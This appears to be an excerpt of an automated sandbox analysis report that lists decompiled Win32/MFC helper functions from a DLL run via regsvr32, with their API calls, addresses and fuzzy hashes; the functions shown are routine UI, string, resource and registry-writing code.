				_t15 =  *0x1004c470; // 0xf256d946
				_t31 = __ecx;
				_v8 = _t15;
				if( *((intOrPtr*)(__ecx + 0x50)) == 0) {
					wsprintfA( &_v24, 0x1003cc28, _a12);
					_t19 = WritePrivateProfileStringA(_a4, _a8,  &_v24,  *(_t31 + 0x64));
				} else {
					_t32 = E10035959(__ecx, _a4);
					if(_t32 != 0) {
						_t22 = RegSetValueExA(_t32, _a8, 0, 4,  &_a12, 4);
						RegCloseKey(_t32);
						_t19 = 0 | _t22 == 0x00000000;
					}
				}
				return E100117AE(_t19, _v8);
			}

0x1002b485
0x1002b48b
0x1002b491
0x1002b494
0x1002b4d8
0x1002b4ee
0x1002b496
0x1002b49e
0x1002b4a2
0x1002b4b3
0x1002b4bc
0x1002b4c6
0x1002b4c9
0x1002b4a2
0x1002b4fe

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 1002B4B3
RegCloseKey.ADVAPI32(00000000,?,?), ref: 1002B4BC
wsprintfA.USER32 ref: 1002B4D8
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002B4EE

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
Instruction ID: 9a6bc9ffc77bb201adb5d4a8a8e7071db867b7f7a5a0f8b8952f6efe61c2a51a
Opcode Fuzzy Hash: eeff4c081b5401d7091317d7c21aef54044c150afcc127b9d4d19e0a4f1937e9
Instruction Fuzzy Hash: A001403250161AEFDB02EFA5CD45E9E3BB8FF44754F044415FA04EB152DB71DA118B90

Uniqueness

Uniqueness Score: -1.00%

Function 10031D85 Relevance: 6.0, APIs: 4, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10031D85(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				char _v268;
				int _v272;
				void* __ebp;
				intOrPtr _t14;
				int _t24;
				intOrPtr* _t30;
				void* _t33;

				_t14 =  *0x1004c470; // 0xf256d946
				_v8 = _t14;
				E100220EE(_t33, SetActiveWindow( *(__ecx + 0x1c)));
				_t24 = 0;
				_v272 = DragQueryFileA(_a4, 0xffffffff, 0, 0);
				_t30 =  *((intOrPtr*)(E100373B5() + 4));
				if(_v272 > 0) {
					do {
						DragQueryFileA(_a4, _t24,  &_v268, 0x104);
						_t18 =  *((intOrPtr*)( *_t30 + 0x88))( &_v268);
						_t24 = _t24 + 1;
					} while (_t24 < _v272);
				}
				DragFinish(_a4);
				return E100117AE(_t18, _v8);
			}

0x10031d8e
0x10031d99
0x10031da3
0x10031dae
0x10031db9
0x10031dca
0x10031dcd
0x10031dcf
0x10031ddf
0x10031dec
0x10031df2
0x10031df3
0x10031dcf
0x10031dfe
0x10031e10

APIs

SetActiveWindow.USER32(?), ref: 10031D9C
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10031DB7
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 10031DDF
DragFinish.SHELL32(?), ref: 10031DFE

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
Instruction ID: f3efa9f330312ec6ab61e1b0fbe20e019f1dfd30d235b1af0ecd9192f479495c
Opcode Fuzzy Hash: bd7094511bd36670db2e3ffd89ec2879d875733b4acb4b41f2f8ac0a86cb3803
Instruction Fuzzy Hash: A2016975900228AFDB11DF64CC84DE97BB8EF49354F0081AAF5859B151CA70AE81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100368F3 Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100368F3(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
				signed short _t21;
				void* _t37;

				_t37 = __ecx;
				if(IsWindow( *(__ecx + 0x1c)) == 0) {
					 *(_t37 + 0xa8) = _a4;
					 *(_t37 + 0xac) = _a8;
					 *(_t37 + 0xa0) = _a12;
					_t21 = _a16;
					 *(_t37 + 0xa4) = _t21;
					return _t21;
				}
				SendMessageA( *(_t37 + 0x1c), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				SendMessageA( *(_t37 + 0x1c), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
				return InvalidateRect( *(_t37 + 0x1c), 0, 1);
			}

0x100368f7
0x10036904
0x10036954
0x1003695d
0x10036966
0x1003696c
0x1003696f
0x00000000
0x1003696f
0x10036925
0x1003693f
0x00000000

APIs

IsWindow.USER32(?), ref: 100368FC
SendMessageA.USER32 ref: 10036925
SendMessageA.USER32 ref: 1003693F
InvalidateRect.USER32(?,00000000,00000001), ref: 10036948

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
Instruction ID: 4b04fdd573aa0d80c43ff6d8227c2b4f41099026dca325be7ad292e47659670a
Opcode Fuzzy Hash: 8d3f6a25381cc96bbc5022150596d566bf0059f3a53c98868d4427e143fea8c6
Instruction Fuzzy Hash: 7E015E70200718AFE7218F19DC45FAABBF8EF45751F10842AFD95DA190D6B0F850DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10036FD8 Relevance: 6.0, APIs: 4, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E10036FD8(short* _a4) {
				char* _v0;
				int _v8;
				char* _v16;
				int _t6;
				char* _t7;
				short* _t11;
				void* _t12;
				void* _t16;
				int _t17;

				_t11 = _a4;
				if(_t11 != 0) {
					__imp__#7(_t11, _t12, _t16);
					_t17 = _t6;
					_t7 = WideCharToMultiByte(0, 0, _t11, _t17, 0, 0, 0, 0);
					_v0 = _t7;
					__imp__#150(0, _t7);
					_v16 = _t7;
					WideCharToMultiByte(0, 0, _t11, _t17, _t7, _v8, 0, 0);
					return _v16;
				}
				return 0;
			}

0x10036fda
0x10036fe3
0x10036fec
0x10036ffc
0x10037002
0x10037006
0x1003700a
0x10037016
0x1003701f
0x00000000
0x10037026
0x00000000

APIs

SysStringLen.OLEAUT32(?), ref: 10036FEC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,10039361,00000000), ref: 10037002
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 1003700A
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,?,10039361,00000000), ref: 1003701F

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Byte$CharMultiStringWide$Alloc
String ID:
API String ID: 3384502665-0
Opcode ID: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
Instruction ID: 594c1e5c48785cf97723a890a7a01ae096917330bd715e74928d8e18aa0a9d1e
Opcode Fuzzy Hash: c6caf2a32dfc1e22ea364bb6c40de8f05e5bfc3eeddc60a89b546b83931860c7
Instruction Fuzzy Hash: 98F030721062387F92219B679C88CABBFDCFE8B2A5B014919F548C2101C2259901CBF1

Uniqueness

Uniqueness Score: -1.00%

Function 10036B96 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10036B96(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				signed int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E1002F372(__ecx, _t19, _a8);
				_t12 = E100202AB(__ecx);
				if((_t12 & 0x00000001) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x1c)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x110))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - (_t16 << 1) - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}

0x10036b9d
0x10036ba4
0x10036ba7
0x10036bae
0x10036bb6
0x10036bc2
0x10036bca
0x10036bdc
0x10036bea
0x10036bf8
0x10036bfc
0x00000000
0x10036bff
0x10036bca
0x10036c03

APIs

Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6

GetParent.USER32(?), ref: 10036BBB
IsZoomed.USER32(00000000), ref: 10036BC2
GetSystemMetrics.USER32 ref: 10036BEA
GetSystemMetrics.USER32 ref: 10036BF8

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
Instruction ID: 7d4475de74911b0f59ada56c103e3f3b6aae8d9b3b29eeb5a8f877c48aa9be1b
Opcode Fuzzy Hash: 68178c6c60ef6917867ce7114bcee81f5725171e5d46bf9d1dfeedfdf515f66b
Instruction Fuzzy Hash: 3801A736A00214AFDB11ABB9DC49F59BBA8EF44740F018119FA45EB191D670B904CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000BFC5 Relevance: 6.0, APIs: 4, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000BFC5(intOrPtr _a4, RECT* _a8, int _a12) {
				struct tagRECT _v20;
				intOrPtr _t28;

				_t28 = _a4;
				if(_a8 != 0) {
					IntersectRect( &_v20, _a8, _t28 - 0x9c);
					EqualRect( &_v20, _a8);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(IsRectEmpty( &_v20) == 0) {
					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t28 - 0xac)) + 0x1c)) + 0x1c),  &_v20, _a12);
				}
				return 0;
			}

0x1000bfd0
0x1000bfd3
0x1000bff6
0x1000c003
0x1000bfd5
0x1000bfe0
0x1000bfe1
0x1000bfe2
0x1000bfe3
0x1000bfe5
0x1000c015
0x1000c02a
0x1000c02a
0x1000c034

APIs

IntersectRect.USER32 ref: 1000BFF6
EqualRect.USER32 ref: 1000C003
IsRectEmpty.USER32 ref: 1000C00D
InvalidateRect.USER32(?,?,?), ref: 1000C02A

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$EmptyEqualIntersectInvalidate
String ID:
API String ID: 3354205298-0
Opcode ID: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
Instruction ID: 1e794ae20577572ca79bd181089135021f598cd57710f0e7593056f93d140995
Opcode Fuzzy Hash: f3fc70dffe40ac54a64bc44e1e78ea87a7d0b2878780ef36980549cbbb75fdb9
Instruction Fuzzy Hash: 1601E57290022EEFEF01DFA5CC88EAAB7ADFB09254F018865E914DB115D231E5198B60

Uniqueness

Uniqueness Score: -1.00%

Function 100214B2 Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100214B2(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10029A8E(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}

0x100214bc
0x10021521
0x00000000
0x100214c4
0x100214c4
0x100214ca
0x00000000
0x100214e7
0x100214f0
0x100214fc
0x10021502
0x10021508
0x1002150c
0x1002150c
0x10021516
0x00000000
0x1002151e
0x100214ca

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 100214F0
SetBkColor.GDI32(00000000,00000000), ref: 100214FC
GetSysColor.USER32(00000008), ref: 1002150C
SetTextColor.GDI32(00000000,?), ref: 10021516

Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
Instruction ID: 07a055e2fde14eb44e4b892d4051d3cd351fecf6f4b2367e44398545aae672e6
Opcode Fuzzy Hash: 270bb4ef9b18727549db2e87848aeeb4d20cea516dda6394fdb349df2a5cdfde
Instruction Fuzzy Hash: 0301283A900529EBEB429FA0EC85AEB3BA4EB55291F908560FD13C40A1C730CD90DB51

Uniqueness

Uniqueness Score: -1.00%

Function 1002415A Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002415A(void* __ecx, CHAR* _a4) {
				void* __edi;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				struct HINSTANCE__* _t16;
				void* _t17;

				_t14 = 0;
				_t11 = 0;
				_t17 = __ecx;
				if(_a4 == 0) {
					L4:
					_t15 = E100232BF(_t17, _t14, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t15;
				}
				_t16 =  *(E100373B5() + 0xc);
				_t8 = FindResourceA(_t16, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t16, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

0x1002415e
0x10024160
0x10024166
0x10024168
0x1002419d
0x100241a7
0x100241a9
0x100241b0
0x100241b0
0x00000000
0x100241b6
0x1002416f
0x1002417c
0x10024184
0x00000000
0x00000000
0x10024188
0x1002418e
0x10024192
0x1002419b
0x00000000
0x1002419b
0x100241bc

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1002417C
LoadResource.KERNEL32(?,00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024188
LockResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 10024195
FreeResource.KERNEL32(00000000,?,?,?,?,1001EFB5,?,?,10006635), ref: 100241B0

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
Instruction ID: fdd0e0ea882c3c69c4099ed456d0cfd7dce8bbf4e7d741b6fad66cb09ea4bd77
Opcode Fuzzy Hash: 1bfed9c45fcc7c4252f354aa1b7bd718f75082ca3ca7a644671ccf1c6bb2871f
Instruction Fuzzy Hash: 40F0903A2412256FD3029FA65C88D3FB6FDEFB59E6B424038FD05D6212DE209C5587A1

Uniqueness

Uniqueness Score: -1.00%

Function 1002095F Relevance: 6.0, APIs: 4, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002095F(void* __ecx) {
				int _t26;
				int _t28;
				void* _t41;

				E10011BF0(0x1003a4d8, _t41);
				_push(__ecx);
				if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
					 *(_t41 - 0x10) =  *((intOrPtr*)( *((intOrPtr*)(E100243B2())) + 0xc))() + 0x10;
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					_push(_t41 - 0x10);
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x4c)))) + 0x8c))();
					lstrcpynA( *(_t41 + 8),  *(_t41 - 0x10),  *(_t41 + 0xc));
					_t26 = lstrlenA( *(_t41 + 8));
					E100014B0( &(( *(_t41 - 0x10))[0xfffffffffffffff0]), _t41 - 0x10);
					_t28 = _t26;
				} else {
					_t28 = GetWindowTextA( *(__ecx + 0x1c),  *(_t41 + 8),  *(_t41 + 0xc));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t28;
			}

0x10020964
0x10020969
0x10020971
0x10020993
0x1002099b
0x100209a2
0x100209a3
0x100209b2
0x100209bb
0x100209c9
0x100209ce
0x10020973
0x1002097c
0x1002097c
0x100209d4
0x100209dc

APIs

__EH_prolog.LIBCMT ref: 10020964
GetWindowTextA.USER32 ref: 1002097C
lstrcpynA.KERNEL32(?,?,?,?,?,1002CC3A,?,00000104,?), ref: 100209B2
lstrlenA.KERNEL32(?,?,?,1002CC3A,?,00000104,?), ref: 100209BB

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prologTextWindowlstrcpynlstrlen
String ID:
API String ID: 3022380644-0
Opcode ID: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
Instruction ID: 9a5806592f70ea17751b7fdaa6094fb832eb62a9ddc39452fd7da2019fb28030
Opcode Fuzzy Hash: 85d23a542434996f255d9aee2352e9f09da7a367e08aff553ccb44c9efc23bd1
Instruction Fuzzy Hash: 75019E36900129EFDB05DFA4CC48BAEBBB2FF48314F00C619F512AB262CB719950DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1001B66F Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B66F(void* __eflags, intOrPtr* _a4, intOrPtr* _a8) {
				void* _t12;
				void* _t18;
				intOrPtr* _t20;
				void* _t21;
				void* _t22;

				_t20 = _a4;
				_t19 = _a8;
				_t12 = E1001B64E( *_t20,  *_a8, _t20);
				_t22 = _t21 + 0xc;
				if(_t12 != 0) {
					_t3 = _t20 + 4; // 0x4
					_t18 = E1001B64E( *_t3, 1, _t3);
					_t22 = _t22 + 0xc;
					if(_t18 != 0) {
						 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
					}
				}
				_t6 = _t20 + 4; // 0x4
				if(E1001B64E( *_t6,  *((intOrPtr*)(_t19 + 4)), _t6) != 0) {
					 *((intOrPtr*)(_t20 + 8)) =  *((intOrPtr*)(_t20 + 8)) + 1;
				}
				_t10 = _t20 + 8; // 0x8
				return E1001B64E( *_t10,  *((intOrPtr*)(_t19 + 8)), _t10);
			}

0x1001b670
0x1001b675
0x1001b67e
0x1001b683
0x1001b688
0x1001b68a
0x1001b692
0x1001b697
0x1001b69c
0x1001b69e
0x1001b69e
0x1001b69c
0x1001b6a1
0x1001b6b4
0x1001b6b6
0x1001b6b6
0x1001b6b9
0x1001b6cc

APIs

___addl.LIBCMT ref: 1001B67E
___addl.LIBCMT ref: 1001B692
___addl.LIBCMT ref: 1001B6AA
___addl.LIBCMT ref: 1001B6C2

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
Instruction ID: 1cba6355bd62d8335d9ad848ad702df172e9c7a68b0d5ea6ff045fc298979a71
Opcode Fuzzy Hash: 0010489af6f0204a76aa343dff914e49e539203f3853c838d62e7c6bfc1b52c0
Instruction Fuzzy Hash: 37F06D7A800A02EFDA548B52DC02EA6B7E9FF65240B004425FD598A031EB32E8A9CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10029B23 Relevance: 6.0, APIs: 4, Instructions: 33
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10029B23(void* __esi, struct HWND__* _a4, CHAR* _a8) {
				intOrPtr _v8;
				char _v264;
				intOrPtr _t10;
				int _t20;

				_t10 =  *0x1004c470; // 0xf256d946
				_v8 = _t10;
				_t20 = lstrlenA(_a8);
				if(_t20 > 0x100 || GetWindowTextA(_a4,  &_v264, 0x100) != _t20 || lstrcmpA( &_v264, _a8) != 0) {
					_t13 = SetWindowTextA(_a4, _a8);
				}
				return E100117AE(_t13, _v8);
			}

0x10029b2c
0x10029b35
0x10029b3e
0x10029b47
0x10029b78
0x10029b78
0x10029b88

APIs

lstrlenA.KERNEL32(?), ref: 10029B38
GetWindowTextA.USER32 ref: 10029B54
lstrcmpA.KERNEL32(?,?), ref: 10029B68
SetWindowTextA.USER32(?,?), ref: 10029B78

Memory Dump Source

Source File: 00000002.00000002.261871295.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.261865938.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261906626.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261917980.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261925463.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.261956850.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
Instruction ID: 93620f556a2fd5ec9caf7d88bc5fd11bb860ddfd3ca1ea698490334ddcd31a8c
Opcode Fuzzy Hash: 49ff855ffa8cc10cf004c62dcee453a07d27d3b0eafd92cf3458448ca621e64d
Instruction Fuzzy Hash: 42F04F7690002CAFDF129FA0DD84DDDBBB9EB04380F008111F946DA120D730DE908B50

Uniqueness

Uniqueness Score: -1.00%

Function 100308EB Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100308EB(void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				void* _t14;

				_t12 = __ecx;
				E10030582(__ecx, __eflags, 1);
				ReleaseCapture();
				_t11 = E100220EE(_t14, GetDesktopWindow());
				LockWindowUpdate(0);
				_t13 = _t12 + 0x84;
				_t8 =  *_t13;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t11 + 0x1c),  *(_t8 + 4));
					 *_t13 =  *_t13 & 0x00000000;
					return _t9;
				}
				return _t8;
			}

0x100308ef
0x100308f1
0x100308f6
0x1003090a
0x1003090c
0x10030912
0x10030918
0x1003091c
0x10030924
0x1003092a
0x00000000
0x1003092a
0x1003092f

APIs

Part of subcall function 10030582: GetStockObject.GDI32(00000000), ref: 10030598
Part of subcall function 10030582: InflateRect.USER32(?,000000FF,000000FF), ref: 1003062D

ReleaseCapture.USER32(?,?,1003093E), ref: 100308F6
